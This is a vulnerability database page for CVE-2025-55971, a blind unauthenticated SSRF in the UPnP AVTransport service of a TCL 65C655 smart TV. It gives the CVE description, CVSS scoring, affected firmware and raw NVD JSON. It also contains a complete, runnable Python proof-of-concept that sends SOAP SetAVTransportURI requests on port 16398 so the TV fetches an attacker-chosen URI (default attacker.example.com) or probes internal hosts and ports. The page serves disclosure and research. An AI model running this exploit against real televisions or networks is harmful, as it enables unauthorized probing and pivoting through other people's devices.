Security Vulnerability Report
CVE-2025-55971 CVSS 4.7 MEDIUM

CVE-2025-55971

Published: 2025-10-03 16:16:18
Last Modified: 2025-10-15 18:17:01

Description

TCL 65C655 Smart TV, running firmware version V8-R75PT01-LF1V269.001116 (Android TV, Kernel 5.4.242+), is vulnerable to a blind, unauthenticated Server-Side Request Forgery (SSRF) vulnerability via the UPnP MediaRenderer service (AVTransport:1). The device accepts unauthenticated SetAVTransportURI SOAP requests over TCP/16398 and attempts to retrieve externally referenced URIs, including attacker-controlled payloads. The blind SSRF allows for sending requests on behalf of the TV, which can be leveraged to probe for other internal or external services accessible by the device (e.g., 127.0.0.1:16XXX, LAN services, or internet targets), potentially enabling additional exploit chains.

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:tcl:65c655_firmware:v8-r75pt01-lf1v269.001116:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tcl:65c655:-:*:*:*:*:*:*:* - NOT VULNERABLE
TCL 65C655 Smart TV firmware version V8-R75PT01-LF1V269.001116

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-55971 - Blind Unauthenticated SSRF in TCL Smart TV UPnP/DLNA AVTransport
# Exploit PoC for TCL 65C655 Smart TV (Firmware V8-R75PT01-LF1V269.001116)
# Author: Szym0n13k

import socket
import sys
import argparse

TARGET_PORT = 16398  # Default UPnP AVTransport service port on TCL Smart TV

SOAP_REQUEST_TEMPLATE = """<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:SetAVTransportURI xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">
      <InstanceID>0</InstanceID>
      <CurrentURI>{payload_uri}</CurrentURI>
      <CurrentURIMetaData></CurrentURIMetaData>
    </u:SetAVTransportURI>
  </s:Body>
</s:Envelope>"""


def send_ssrf_payload(target_ip, payload_uri, timeout=5):
    """
    Send a malicious SetAVTransportURI SOAP request to trigger blind SSRF.

    :param target_ip: IP address of the target TCL Smart TV
    :param payload_uri: Attacker-controlled URI (e.g., http://attacker.com/callback)
    :param timeout: Connection timeout in seconds
    """
    soap_payload = SOAP_REQUEST_TEMPLATE.format(payload_uri=payload_uri)

    http_request = (
        f"POST /AVTransport/ctrl HTTP/1.1\r\n"
        f"Host: {target_ip}:{TARGET_PORT}\r\n"
        f"Content-Type: text/xml; charset=\"utf-8\"\r\n"
        f"Content-Length: {len(soap_payload)}\r\n"
        f"SOAPAction: \"urn:schemas-upnp-org:service:AVTransport:1#SetAVTransportURI\"\r\n"
        f"Connection: close\r\n"
        f"\r\n"
        f"{soap_payload}"
    )

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        sock.connect((target_ip, TARGET_PORT))
        sock.sendall(http_request.encode('utf-8'))

        response = sock.recv(4096).decode('utf-8', errors='ignore')
        sock.close()

        print(f"[+] Request sent to {target_ip}:{TARGET_PORT}")
        print(f"[+] Payload URI: {payload_uri}")
        print(f"[+] Response:\n{response}")

        if "200 OK" in response:
            print("[+] SSRF request likely triggered successfully!")
            return True
        else:
            print("[-] Unexpected response received.")
            return False

    except socket.timeout:
        print(f"[-] Connection timed out. Target may not be reachable.")
        return False
    except ConnectionRefusedError:
        print(f"[-] Connection refused. Port {TARGET_PORT} may be closed.")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def probe_internal_port(target_ip, internal_host, internal_port):
    """
    Probe internal services by leveraging the blind SSRF.
    Uses gopher:// or http:// scheme to target internal hosts.
    """
    payload_uri = f"http://{internal_host}:{internal_port}/"
    print(f"\n[*] Probing internal service: {internal_host}:{internal_port}")
    return send_ssrf_payload(target_ip, payload_uri)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2025-55971 - Blind SSRF PoC for TCL Smart TV UPnP AVTransport"
    )
    parser.add_argument("target_ip", help="Target TCL Smart TV IP address")
    parser.add_argument(
        "-u", "--uri",
        default="http://attacker.example.com/callback",
        help="Attacker-controlled callback URI (default: http://attacker.example.com/callback)"
    )
    parser.add_argument(
        "--probe-internal",
        action="store_true",
        help="Enable internal port probing mode"
    )
    parser.add_argument(
        "--internal-host",
        default="127.0.0.1",
        help="Internal host to probe (default: 127.0.0.1)"
    )
    parser.add_argument(
        "--internal-port",
        type=int,
        default=16398,
        help="Internal port to probe (default: 16398)"
    )

    args = parser.parse_args()

    print("=" * 60)
    print("CVE-2025-55971 PoC - TCL Smart TV Blind SSRF")
    print("Target: TCL 65C655 Smart TV")
    print("Firmware: V8-R75PT01-LF1V269.001116")
    print("=" * 60)

    if args.probe_internal:
        probe_internal_port(args.target_ip, args.internal_host, args.internal_port)
    else:
        send_ssrf_payload(args.target_ip, args.uri)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55971", "sourceIdentifier": "[email protected]", "published": "2025-10-03T16:16:17.540", "lastModified": "2025-10-15T18:17:00.927", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TCL 65C655 Smart TV, running firmware version V8-R75PT01-LF1V269.001116 (Android TV, Kernel 5.4.242+), is vulnerable to a blind, unauthenticated Server-Side Request Forgery (SSRF) vulnerability via the UPnP MediaRenderer service (AVTransport:1). The device accepts unauthenticated SetAVTransportURI SOAP requests over TCP/16398 and attempts to retrieve externally referenced URIs, including attacker-controlled payloads. The blind SSRF allows for sending requests on behalf of the TV, which can be leveraged to probe for other internal or external services accessible by the device (e.g., 127.0.0.1:16XXX, LAN services, or internet targets), potentially enabling additional exploit chains."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tcl:65c655_firmware:v8-r75pt01-lf1v269.001116:*:*:*:*:*:*:*", "matchCriteriaId": "1004749F-C65B-4868-85DB-6E135DFE71EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tcl:65c655:-:*:*:*:*:*:*:*", 
"matchCriteriaId": "71800B88-6570-4AA3-8968-A897A498739E"}]}]}], "references": [{"url": "https://github.com/Szym0n13k/CVE-2025-55971-Blind-Unauthenticated-SSRF-in-TCL-Smart-TV-UPnP-DLNA-AVTransport", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.youtube.com/watch?v=FeNLGR_xFIA", "source": "[email protected]", "tags": ["Exploit"]}]}}